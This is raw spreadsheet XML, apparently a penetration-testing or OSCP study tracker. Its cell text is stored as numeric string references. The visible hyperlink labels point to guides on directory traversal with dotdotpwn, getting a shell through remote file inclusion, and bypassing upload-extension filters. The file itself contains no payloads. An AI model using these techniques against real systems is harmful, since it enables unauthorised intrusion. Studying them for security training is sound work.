      <c r="B543" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C543" s="189" t="s">
        <v>258</v>
      </c>
      <c r="D543" s="189" t="s">
        <v>840</v>
      </c>
      <c r="E543" s="190" t="s">
        <v>22683</v>
      </c>
      <c r="F543" s="190"/>
      <c r="G543" s="191" t="s">
        <v>22684</v>
      </c>
      <c r="H543" s="191" t="s">
        <v>22685</v>
      </c>
      <c r="I543" s="191"/>
    </row>
    <row r="544" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A544" s="189" t="s">
        <v>287</v>
      </c>
      <c r="B544" s="189" t="s">
        <v>567</v>
      </c>
      <c r="C544" s="189" t="s">
        <v>22689</v>
      </c>
      <c r="D544" s="189" t="s">
        <v>803</v>
      </c>
      <c r="E544" s="190" t="s">
        <v>788</v>
      </c>
      <c r="F544" s="190"/>
      <c r="G544" s="191" t="s">
        <v>22690</v>
      </c>
      <c r="H544" s="199" t="s">
        <v>22691</v>
      </c>
      <c r="I544" s="191"/>
    </row>
    <row r="545" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A545" s="10" t="s">
        <v>22693</v>
      </c>
      <c r="B545" s="10"/>
      <c r="C545" s="10"/>
      <c r="D545" s="10"/>
      <c r="E545" s="7"/>
      <c r="F545" s="7"/>
      <c r="G545" s="207" t="s">
        <v>22694</v>
      </c>
      <c r="H545" s="8"/>
      <c r="I545" s="8"/>
    </row>
    <row r="546" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A546" s="189" t="s">
        <v>287</v>
      </c>
      <c r="B546" s="189" t="s">
        <v>567</v>
      </c>
      <c r="C546" s="189" t="s">
        <v>258</v>
      </c>
      <c r="D546" s="10" t="s">
        <v>465</v>
      </c>
      <c r="E546" s="15" t="s">
        <v>716</v>
      </c>
      <c r="F546" s="190"/>
      <c r="G546" s="191" t="s">
        <v>22708</v>
      </c>
      <c r="H546" s="191" t="s">
        <v>22709</v>
      </c>
      <c r="I546" s="191"/>
    </row>
    <row r="547" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A547" s="189" t="s">
        <v>223</v>
      </c>
      <c r="B547" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C547" s="189" t="s">
        <v>22736</v>
      </c>
      <c r="D547" s="189" t="s">
        <v>719</v>
      </c>
      <c r="E547" s="190" t="s">
        <v>719</v>
      </c>
      <c r="F547" s="190"/>
      <c r="G547" s="191" t="s">
        <v>22741</v>
      </c>
      <c r="H547" s="191" t="s">
        <v>22737</v>
      </c>
      <c r="I547" s="191"/>
    </row>
    <row r="548" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A548" s="189" t="s">
        <v>223</v>
      </c>
      <c r="B548" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C548" s="189" t="s">
        <v>22738</v>
      </c>
      <c r="D548" s="189" t="s">
        <v>719</v>
      </c>
      <c r="E548" s="190" t="s">
        <v>719</v>
      </c>
      <c r="F548" s="190"/>
      <c r="G548" s="191" t="s">
        <v>22739</v>
      </c>
      <c r="H548" s="191" t="s">
        <v>22740</v>
      </c>
      <c r="I548" s="191"/>
    </row>
    <row r="549" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A549" s="189" t="s">
        <v>223</v>
      </c>
      <c r="B549" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C549" s="189" t="s">
        <v>32</v>
      </c>
      <c r="D549" s="189" t="s">
        <v>22742</v>
      </c>
      <c r="E549" s="190"/>
      <c r="F549" s="190"/>
      <c r="G549" s="191" t="s">
        <v>22743</v>
      </c>
      <c r="H549" s="191" t="s">
        <v>22744</v>
      </c>
      <c r="I549" s="191"/>
    </row>
    <row r="550" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A550" s="189" t="s">
        <v>223</v>
      </c>
      <c r="B550" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C550" s="189" t="s">
        <v>22745</v>
      </c>
      <c r="D550" s="189" t="s">
        <v>22742</v>
      </c>
      <c r="E550" s="190"/>
      <c r="F550" s="190"/>
      <c r="G550" s="191" t="s">
        <v>22746</v>
      </c>
      <c r="H550" s="191" t="s">
        <v>22747</v>
      </c>
      <c r="I550" s="191"/>
    </row>
    <row r="551" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A551" s="189" t="s">
        <v>223</v>
      </c>
      <c r="B551" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C551" s="189" t="s">
        <v>22748</v>
      </c>
      <c r="D551" s="189" t="s">
        <v>22742</v>
      </c>
      <c r="E551" s="190"/>
      <c r="F551" s="190"/>
      <c r="G551" s="191" t="s">
        <v>269</v>
      </c>
      <c r="H551" s="191" t="s">
        <v>22749</v>
      </c>
      <c r="I551" s="191"/>
    </row>
    <row r="552" spans="1:9" ht="30.95" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A552" s="189" t="s">
        <v>223</v>
      </c>
      <c r="B552" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C552" s="189" t="s">
        <v>258</v>
      </c>
      <c r="D552" s="189" t="s">
        <v>22742</v>
      </c>
      <c r="E552" s="190"/>
      <c r="F552" s="190"/>
      <c r="G552" s="191" t="s">
        <v>22750</v>
      </c>
      <c r="H552" s="191"/>
      <c r="I552" s="191"/>
    </row>
    <row r="553" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A553" s="189" t="s">
        <v>287</v>
      </c>
      <c r="B553" s="189" t="s">
        <v>31</v>
      </c>
      <c r="C553" s="189" t="s">
        <v>22751</v>
      </c>
      <c r="D553" s="189" t="s">
        <v>207</v>
      </c>
      <c r="E553" s="190" t="s">
        <v>867</v>
      </c>
      <c r="F553" s="190"/>
      <c r="G553" s="191"/>
      <c r="H553" s="191" t="s">
        <v>22752</v>
      </c>
      <c r="I553" s="191"/>
    </row>
    <row r="554" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A554" s="10" t="s">
        <v>22693</v>
      </c>
      <c r="B554" s="10"/>
      <c r="C554" s="10"/>
      <c r="D554" s="10"/>
      <c r="E554" s="7"/>
      <c r="F554" s="7"/>
      <c r="G554" s="8" t="s">
        <v>22768</v>
      </c>
      <c r="H554" s="8" t="s">
        <v>22769</v>
      </c>
      <c r="I554" s="8"/>
    </row>
    <row r="555" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A555" s="10" t="s">
        <v>22693</v>
      </c>
      <c r="B555" s="10"/>
      <c r="C555" s="10"/>
      <c r="D555" s="10"/>
      <c r="E555" s="7"/>
      <c r="F555" s="7"/>
      <c r="G555" s="8" t="s">
        <v>22770</v>
      </c>
      <c r="H555" s="8"/>
      <c r="I555" s="8"/>
    </row>
    <row r="556" spans="1:9" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A556" s="10" t="s">
        <v>223</v>
      </c>
      <c r="B556" s="10" t="s">
        <v>31</v>
      </c>
      <c r="C556" s="10" t="s">
        <v>22771</v>
      </c>
      <c r="D556" s="10" t="s">
        <v>22772</v>
      </c>
      <c r="E556" s="7"/>
      <c r="F556" s="7"/>
      <c r="G556" s="8" t="s">
        <v>22774</v>
      </c>
      <c r="H556" s="8" t="s">
        <v>22773</v>
      </c>
      <c r="I556" s="8"/>
    </row>
    <row r="557" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A557" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B557" s="10" t="s">
        <v>31</v>
      </c>
      <c r="C557" s="10" t="s">
        <v>235</v>
      </c>
      <c r="D557" s="10"/>
      <c r="E557" s="7" t="s">
        <v>485</v>
      </c>
      <c r="F557" s="7"/>
      <c r="G557" s="8" t="s">
        <v>22775</v>
      </c>
      <c r="H557" s="8"/>
      <c r="I557" s="8"/>
    </row>
    <row r="558" spans="1:9" ht="63" x14ac:dyDescent="0.25">
      <c r="A558" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B558" s="10" t="s">
        <v>38</v>
      </c>
      <c r="C558" s="10" t="s">
        <v>854</v>
      </c>
      <c r="D558" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E558" s="7" t="s">
        <v>857</v>
      </c>
      <c r="F558" s="7"/>
      <c r="G558" s="8"/>
      <c r="H558" s="224" t="s">
        <v>22776</v>
      </c>
      <c r="I558" s="8"/>
    </row>
    <row r="559" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A559" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B559" s="10" t="s">
        <v>567</v>
      </c>
      <c r="C559" s="10"/>
      <c r="D559" s="10" t="s">
        <v>803</v>
      </c>
      <c r="E559" s="7" t="s">
        <v>22777</v>
      </c>
      <c r="F559" s="7"/>
      <c r="G559" s="8" t="s">
        <v>22778</v>
      </c>
      <c r="H559" s="8"/>
      <c r="I559" s="8"/>
    </row>
    <row r="560" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A560" s="10" t="s">
        <v>30</v>
      </c>
      <c r="B560" s="10" t="s">
        <v>567</v>
      </c>
      <c r="C560" s="10"/>
      <c r="D560" s="10" t="s">
        <v>83</v>
      </c>
      <c r="E560" s="7"/>
      <c r="F560" s="7"/>
      <c r="G560" s="8" t="s">
        <v>22779</v>
      </c>
      <c r="H560" s="8"/>
      <c r="I560" s="8"/>
    </row>
    <row r="561" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A561" s="10" t="s">
        <v>22693</v>
      </c>
      <c r="B561" s="10"/>
      <c r="C561" s="10"/>
      <c r="D561" s="10"/>
      <c r="E561" s="7"/>
      <c r="F561" s="7"/>
      <c r="G561" s="8" t="s">
        <v>22780</v>
      </c>
      <c r="H561" s="8"/>
      <c r="I561" s="8"/>
    </row>
    <row r="562" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A562" s="10" t="s">
        <v>22693</v>
      </c>
      <c r="B562" s="10"/>
      <c r="C562" s="10"/>
      <c r="D562" s="10"/>
      <c r="E562" s="7"/>
      <c r="F562" s="7"/>
      <c r="G562" s="8" t="s">
        <v>22782</v>
      </c>
      <c r="H562" s="8"/>
      <c r="I562" s="8"/>
    </row>
    <row r="563" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A563" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B563" s="10"/>
      <c r="C563" s="10"/>
      <c r="D563" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E563" s="10" t="s">
        <v>625</v>
      </c>
      <c r="F563" s="7"/>
      <c r="G563" s="8" t="s">
        <v>626</v>
      </c>
      <c r="H563" s="8"/>
      <c r="I563" s="8"/>
    </row>
    <row r="564" spans="1:9" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A564" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B564" s="10"/>
      <c r="C564" s="10"/>
      <c r="D564" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E564" s="10" t="s">
        <v>627</v>
      </c>
      <c r="F564" s="7"/>
      <c r="G564" s="8" t="s">
        <v>628</v>
      </c>
      <c r="H564" s="8"/>
      <c r="I564" s="8"/>
    </row>
    <row r="565" spans="1:9" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A565" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B565" s="10"/>
      <c r="C565" s="10"/>
      <c r="D565" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E565" s="10" t="s">
        <v>629</v>
      </c>
      <c r="F565" s="7"/>
      <c r="G565" s="8" t="s">
        <v>630</v>
      </c>
      <c r="H565" s="8"/>
      <c r="I565" s="8"/>
    </row>
    <row r="566" spans="1:9" ht="252" x14ac:dyDescent="0.25">
      <c r="A566" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B566" s="10"/>
      <c r="C566" s="10"/>
      <c r="D566" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E566" s="10" t="s">
        <v>631</v>
      </c>
      <c r="F566" s="7"/>
      <c r="G566" s="8" t="s">
        <v>632</v>
      </c>
      <c r="H566" s="8" t="s">
        <v>633</v>
      </c>
      <c r="I566" s="8"/>
    </row>
    <row r="567" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A567" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B567" s="10"/>
      <c r="C567" s="10"/>
      <c r="D567" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E567" s="10" t="s">
        <v>631</v>
      </c>
      <c r="F567" s="7"/>
      <c r="G567" s="8" t="s">
        <v>634</v>
      </c>
      <c r="H567" s="8" t="s">
        <v>635</v>
      </c>
      <c r="I567" s="8"/>
    </row>
    <row r="568" spans="1:9" ht="141.75" x14ac:dyDescent="0.25">
      <c r="A568" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B568" s="10"/>
      <c r="C568" s="10"/>
      <c r="D568" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E568" s="10" t="s">
        <v>631</v>
      </c>
      <c r="F568" s="7"/>
      <c r="G568" s="8" t="s">
        <v>637</v>
      </c>
      <c r="H568" s="8"/>
      <c r="I568" s="8"/>
    </row>
    <row r="569" spans="1:9" ht="189" x14ac:dyDescent="0.25">
      <c r="A569" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B569" s="10"/>
      <c r="C569" s="10"/>
      <c r="D569" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E569" s="10" t="s">
        <v>631</v>
      </c>
      <c r="F569" s="7"/>
      <c r="G569" s="8" t="s">
        <v>638</v>
      </c>
      <c r="H569" s="8"/>
      <c r="I569" s="8"/>
    </row>
    <row r="570" spans="1:9" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A570" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B570" s="10"/>
      <c r="C570" s="10" t="s">
        <v>639</v>
      </c>
      <c r="D570" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E570" s="10"/>
      <c r="F570" s="7"/>
      <c r="G570" s="8" t="s">
        <v>640</v>
      </c>
      <c r="H570" s="8" t="s">
        <v>641</v>
      </c>
      <c r="I570" s="8"/>
    </row>
    <row r="571" spans="1:9" ht="267.75" x14ac:dyDescent="0.25">
      <c r="A571" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B571" s="10"/>
      <c r="C571" s="10"/>
      <c r="D571" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E571" s="10" t="s">
        <v>642</v>
      </c>
      <c r="F571" s="7"/>
      <c r="G571" s="8" t="s">
        <v>643</v>
      </c>
      <c r="H571" s="8"/>
      <c r="I571" s="8"/>
    </row>
    <row r="572" spans="1:9" ht="94.5" x14ac:dyDescent="0.25">
      <c r="A572" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B572" s="10"/>
      <c r="C572" s="10"/>
      <c r="D572" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E572" s="10" t="s">
        <v>644</v>
      </c>
      <c r="F572" s="7"/>
      <c r="G572" s="8" t="s">
        <v>645</v>
      </c>
      <c r="H572" s="8" t="s">
        <v>646</v>
      </c>
      <c r="I572" s="8"/>
    </row>
    <row r="573" spans="1:9" ht="63" x14ac:dyDescent="0.25">
      <c r="A573" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B573" s="10"/>
      <c r="C573" s="10" t="s">
        <v>647</v>
      </c>
      <c r="D573" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E573" s="10" t="s">
        <v>644</v>
      </c>
      <c r="F573" s="7"/>
      <c r="G573" s="8" t="s">
        <v>648</v>
      </c>
      <c r="H573" s="8"/>
      <c r="I573" s="8"/>
    </row>
    <row r="574" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A574" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B574" s="10"/>
      <c r="C574" s="10" t="s">
        <v>649</v>
      </c>
      <c r="D574" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E574" s="10" t="s">
        <v>644</v>
      </c>
      <c r="F574" s="7"/>
      <c r="G574" s="8" t="s">
        <v>650</v>
      </c>
      <c r="H574" s="8" t="s">
        <v>651</v>
      </c>
      <c r="I574" s="8"/>
    </row>
    <row r="575" spans="1:9" ht="110.25" x14ac:dyDescent="0.25">
      <c r="A575" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B575" s="10"/>
      <c r="C575" s="10" t="s">
        <v>647</v>
      </c>
      <c r="D575" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E575" s="10" t="s">
        <v>644</v>
      </c>
      <c r="F575" s="7"/>
      <c r="G575" s="8" t="s">
        <v>652</v>
      </c>
      <c r="H575" s="8"/>
      <c r="I575" s="8"/>
    </row>
    <row r="576" spans="1:9" ht="17.25" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A576" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B576" s="10"/>
      <c r="C576" s="10" t="s">
        <v>653</v>
      </c>
      <c r="D576" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E576" s="10"/>
      <c r="F576" s="7"/>
      <c r="G576" s="8" t="s">
        <v>654</v>
      </c>
      <c r="H576" s="8"/>
      <c r="I576" s="8"/>
    </row>
    <row r="577" spans="1:9" ht="173.25" x14ac:dyDescent="0.25">
      <c r="A577" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B577" s="10"/>
      <c r="C577" s="10" t="s">
        <v>655</v>
      </c>
      <c r="D577" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E577" s="10" t="s">
        <v>631</v>
      </c>
      <c r="F577" s="7"/>
      <c r="G577" s="8" t="s">
        <v>656</v>
      </c>
      <c r="H577" s="8" t="s">
        <v>22783</v>
      </c>
      <c r="I577" s="8"/>
    </row>
    <row r="578" spans="1:9" ht="141.75" x14ac:dyDescent="0.25">
      <c r="A578" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B578" s="10"/>
      <c r="C578" s="10" t="s">
        <v>657</v>
      </c>
      <c r="D578" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E578" s="10" t="s">
        <v>658</v>
      </c>
      <c r="F578" s="7"/>
      <c r="G578" s="8" t="s">
        <v>659</v>
      </c>
      <c r="H578" s="8"/>
      <c r="I578" s="8"/>
    </row>
    <row r="579" spans="1:9" ht="94.5" x14ac:dyDescent="0.25">
      <c r="A579" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B579" s="10"/>
      <c r="C579" s="10" t="s">
        <v>710</v>
      </c>
      <c r="D579" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E579" s="10" t="s">
        <v>711</v>
      </c>
      <c r="F579" s="10" t="s">
        <v>54</v>
      </c>
      <c r="G579" s="8" t="s">
        <v>712</v>
      </c>
      <c r="H579" s="8"/>
      <c r="I579" s="8"/>
    </row>
    <row r="580" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A580" s="10" t="s">
        <v>22693</v>
      </c>
      <c r="B580" s="10"/>
      <c r="C580" s="10"/>
      <c r="D580" s="10"/>
      <c r="E580" s="7"/>
      <c r="F580" s="7"/>
      <c r="G580" s="8" t="s">
        <v>22778</v>
      </c>
      <c r="H580" s="8"/>
      <c r="I580" s="8"/>
    </row>
    <row r="581" spans="1:9" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A581" s="10" t="s">
        <v>22693</v>
      </c>
      <c r="B581" s="10"/>
      <c r="C581" s="10"/>
      <c r="D581" s="10"/>
      <c r="E581" s="7"/>
      <c r="F581" s="7"/>
      <c r="G581" s="8" t="s">
        <v>350</v>
      </c>
      <c r="H581" s="8"/>
      <c r="I581" s="8"/>
    </row>
    <row r="582" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A582" s="189" t="s">
        <v>22693</v>
      </c>
      <c r="B582" s="189"/>
      <c r="C582" s="189"/>
      <c r="D582" s="189"/>
      <c r="E582" s="190"/>
      <c r="F582" s="190"/>
      <c r="G582" s="191" t="s">
        <v>24</v>
      </c>
      <c r="H582" s="191" t="s">
        <v>22785</v>
      </c>
      <c r="I582" s="191"/>
    </row>
    <row r="583" spans="1:9" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A583" s="189" t="s">
        <v>22693</v>
      </c>
      <c r="B583" s="10"/>
      <c r="C583" s="10"/>
      <c r="D583" s="10"/>
      <c r="E583" s="7"/>
      <c r="F583" s="7"/>
      <c r="G583" s="8" t="s">
        <v>1057</v>
      </c>
      <c r="H583" s="8" t="s">
        <v>22786</v>
      </c>
      <c r="I583" s="8"/>
    </row>
    <row r="584" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A584" s="189" t="s">
        <v>22693</v>
      </c>
      <c r="B584" s="10"/>
      <c r="C584" s="10"/>
      <c r="D584" s="10"/>
      <c r="E584" s="7"/>
      <c r="F584" s="7"/>
      <c r="G584" s="8" t="s">
        <v>344</v>
      </c>
      <c r="H584" s="8" t="s">
        <v>22789</v>
      </c>
      <c r="I584" s="8"/>
    </row>
    <row r="585" spans="1:9" s="193" customFormat="1" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A585" s="181" t="s">
        <v>287</v>
      </c>
      <c r="B585" s="181" t="s">
        <v>38</v>
      </c>
      <c r="C585" s="181" t="s">
        <v>389</v>
      </c>
      <c r="D585" s="181" t="s">
        <v>440</v>
      </c>
      <c r="F585" s="181" t="s">
        <v>391</v>
      </c>
      <c r="G585" s="192" t="s">
        <v>22790</v>
      </c>
      <c r="H585" s="192" t="s">
        <v>22791</v>
      </c>
      <c r="I585" s="192"/>
    </row>
    <row r="586" spans="1:9" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A586" s="189" t="s">
        <v>287</v>
      </c>
      <c r="B586" s="189" t="s">
        <v>38</v>
      </c>
      <c r="C586" s="189" t="s">
        <v>399</v>
      </c>
      <c r="D586" s="189" t="s">
        <v>440</v>
      </c>
      <c r="E586" s="190" t="s">
        <v>779</v>
      </c>
      <c r="F586" s="190"/>
      <c r="G586" s="191" t="s">
        <v>22795</v>
      </c>
      <c r="H586" s="191" t="s">
        <v>22796</v>
      </c>
      <c r="I586" s="191"/>
    </row>
    <row r="587" spans="1:9" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A587" s="189" t="s">
        <v>223</v>
      </c>
      <c r="B587" s="189"/>
      <c r="C587" s="189" t="s">
        <v>22013</v>
      </c>
      <c r="D587" s="189" t="s">
        <v>248</v>
      </c>
      <c r="E587" s="190"/>
      <c r="F587" s="190"/>
      <c r="G587" s="191" t="s">
        <v>22797</v>
      </c>
      <c r="H587" s="191"/>
      <c r="I587" s="191"/>
    </row>
  </sheetData>
  <phoneticPr fontId="14" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="G128" r:id="rId1" xr:uid="{00000000-0004-0000-0000-000000000000}"/>
    <hyperlink ref="G153" r:id="rId2" xr:uid="{00000000-0004-0000-0000-000001000000}"/>
    <hyperlink ref="H183" r:id="rId3" xr:uid="{00000000-0004-0000-0000-000002000000}"/>
    <hyperlink ref="G197" r:id="rId4" xr:uid="{00000000-0004-0000-0000-000003000000}"/>
    <hyperlink ref="H208" r:id="rId5" xr:uid="{00000000-0004-0000-0000-000004000000}"/>
    <hyperlink ref="H225" r:id="rId6" xr:uid="{00000000-0004-0000-0000-000005000000}"/>
    <hyperlink ref="H226" r:id="rId7" xr:uid="{00000000-0004-0000-0000-000006000000}"/>
    <hyperlink ref="H227" r:id="rId8" xr:uid="{00000000-0004-0000-0000-000007000000}"/>
    <hyperlink ref="G236" r:id="rId9" xr:uid="{00000000-0004-0000-0000-000008000000}"/>
    <hyperlink ref="H197" r:id="rId10" xr:uid="{00000000-0004-0000-0000-000009000000}"/>
    <hyperlink ref="H250" r:id="rId11" xr:uid="{00000000-0004-0000-0000-00000A000000}"/>
    <hyperlink ref="G254" r:id="rId12" xr:uid="{00000000-0004-0000-0000-00000B000000}"/>
    <hyperlink ref="H335" r:id="rId13" xr:uid="{00000000-0004-0000-0000-00000C000000}"/>
    <hyperlink ref="G390" r:id="rId14" xr:uid="{00000000-0004-0000-0000-00000D000000}"/>
    <hyperlink ref="H402" r:id="rId15" xr:uid="{00000000-0004-0000-0000-00000E000000}"/>
    <hyperlink ref="H408" r:id="rId16" xr:uid="{00000000-0004-0000-0000-00000F000000}"/>
    <hyperlink ref="G443" r:id="rId17" xr:uid="{00000000-0004-0000-0000-000010000000}"/>
    <hyperlink ref="G449" r:id="rId18" xr:uid="{00000000-0004-0000-0000-000011000000}"/>
    <hyperlink ref="H473" r:id="rId19" display="https://www.sqltutorial.org/sql-cheat-sheet/" xr:uid="{00000000-0004-0000-0000-000012000000}"/>
    <hyperlink ref="H489" r:id="rId20" xr:uid="{00000000-0004-0000-0000-000013000000}"/>
    <hyperlink ref="H499" r:id="rId21" display="https://tools.kali.org/information-gathering/dotdotpwn_x000a__x000a_we can use dot dot pwn to automate this lel" xr:uid="{00000000-0004-0000-0000-000014000000}"/>
    <hyperlink ref="H463" r:id="rId22" xr:uid="{00000000-0004-0000-0000-000015000000}"/>
    <hyperlink ref="H506" r:id="rId23" display="https://null-byte.wonderhowto.com/how-to/exploit-remote-file-inclusion-get-shell-0187006/_x000a_" xr:uid="{00000000-0004-0000-0000-000016000000}"/>
    <hyperlink ref="H504" r:id="rId24" xr:uid="{00000000-0004-0000-0000-000017000000}"/>
    <hyperlink ref="H508" r:id="rId25" display="https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html_x000a__x000a_Use the below to bypass upload file extension restrictions_x000a_" xr:uid="{00000000-0004-0000-0000-000018000000}"/>
    <hyperlink ref="H32" r:id="rId26" xr:uid="{00000000-0004-0000-0000-000019000000}"/>
    <hyperlink ref="H357" r:id="rId27" xr:uid="{00000000-0004-0000-0000-00001A000000}"/>
    <hyperlink ref="H515" r:id="rId28" xr:uid="{00000000-0004-0000-0000-00001B000000}"/>
    <hyperlink ref="H519" r:id="rId29" xr:uid="{00000000-0004-0000-0000-00001C000000}"/>
    <hyperlink ref="H544" r:id="rId30" xr:uid="{00000000-0004-0000-0000-00001D000000}"/>
    <hyperlink ref="G545" r:id="rId31" xr:uid="{00000000-0004-0000-0000-00001E000000}"/>
    <hyperlink ref="H507" r:id="rId32" location="gref" xr:uid="{00000000-0004-0000-0000-00001F000000}"/>
    <hyperlink ref="H502" r:id="rId33" xr:uid="{00000000-0004-0000-0000-000020000000}"/>
    <hyperlink ref="H558" r:id="rId34" xr:uid="{00000000-0004-0000-0000-000021000000}"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId35"/>
  <drawing r:id="rId36"/>
  <tableParts count="1">
    <tablePart r:id="rId37"/>
  </tableParts>
  <extLst>
    <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{3A4CF648-6AED-40f4-86FF-DC5316D8AED3}">
      <x14:slicerList xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main">
        <x14:slicer r:id="rId3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133"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C108" sqref="C108"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.85546875" customWidth="1"/>
    <col min="2" max="2" width="18.28515625" customWidth="1"/>
    <col min="3" max="3" width="105.85546875" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="40.140625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A1" s="225" t="s">
        <v>1151</v>
      </c>
      <c r="B1" s="226"/>
      <c r="C1" s="226"/>
      <c r="D1" s="226"/>
      <c r="E1" s="226"/>
      <c r="F1" s="226"/>
      <c r="G1" s="226"/>
      <c r="H1" s="226"/>
      <c r="I1" s="226"/>
      <c r="J1" s="226"/>
      <c r="K1" s="226"/>
      <c r="L1" s="226"/>
      <c r="M1" s="226"/>
    </row>
    <row r="2" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A2" s="226"/>
      <c r="B2" s="226"/>
      <c r="C2" s="226"/>
      <c r="D2" s="226"/>
      <c r="E2" s="226"/>
      <c r="F2" s="226"/>
      <c r="G2" s="226"/>
      <c r="H2" s="226"/>
      <c r="I2" s="226"/>
      <c r="J2" s="226"/>
      <c r="K2" s="226"/>
      <c r="L2" s="226"/>
      <c r="M2" s="226"/>
    </row>
    <row r="3" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A3" s="226"/>
      <c r="B3" s="226"/>
      <c r="C3" s="226"/>
      <c r="D3" s="226"/>
      <c r="E3" s="226"/>
      <c r="F3" s="226"/>
      <c r="G3" s="226"/>
      <c r="H3" s="226"/>
      <c r="I3" s="226"/>
      <c r="J3" s="226"/>
      <c r="K3" s="226"/>
      <c r="L3" s="226"/>
      <c r="M3" s="226"/>
    </row>
    <row r="4" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A4" s="226"/>
      <c r="B4" s="226"/>
      <c r="C4" s="226"/>
      <c r="D4" s="226"/>
      <c r="E4" s="226"/>
      <c r="F4" s="226"/>
      <c r="G4" s="226"/>
      <c r="H4" s="226"/>
      <c r="I4" s="226"/>
      <c r="J4" s="226"/>
      <c r="K4" s="226"/>
      <c r="L4" s="226"/>
      <c r="M4" s="226"/>
    </row>
    <row r="5" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A5" s="226"/>
      <c r="B5" s="226"/>
      <c r="C5" s="226"/>
      <c r="D5" s="226"/>
      <c r="E5" s="226"/>
      <c r="F5" s="226"/>
      <c r="G5" s="226"/>
      <c r="H5" s="226"/>
      <c r="I5" s="226"/>
      <c r="J5" s="226"/>
      <c r="K5" s="226"/>
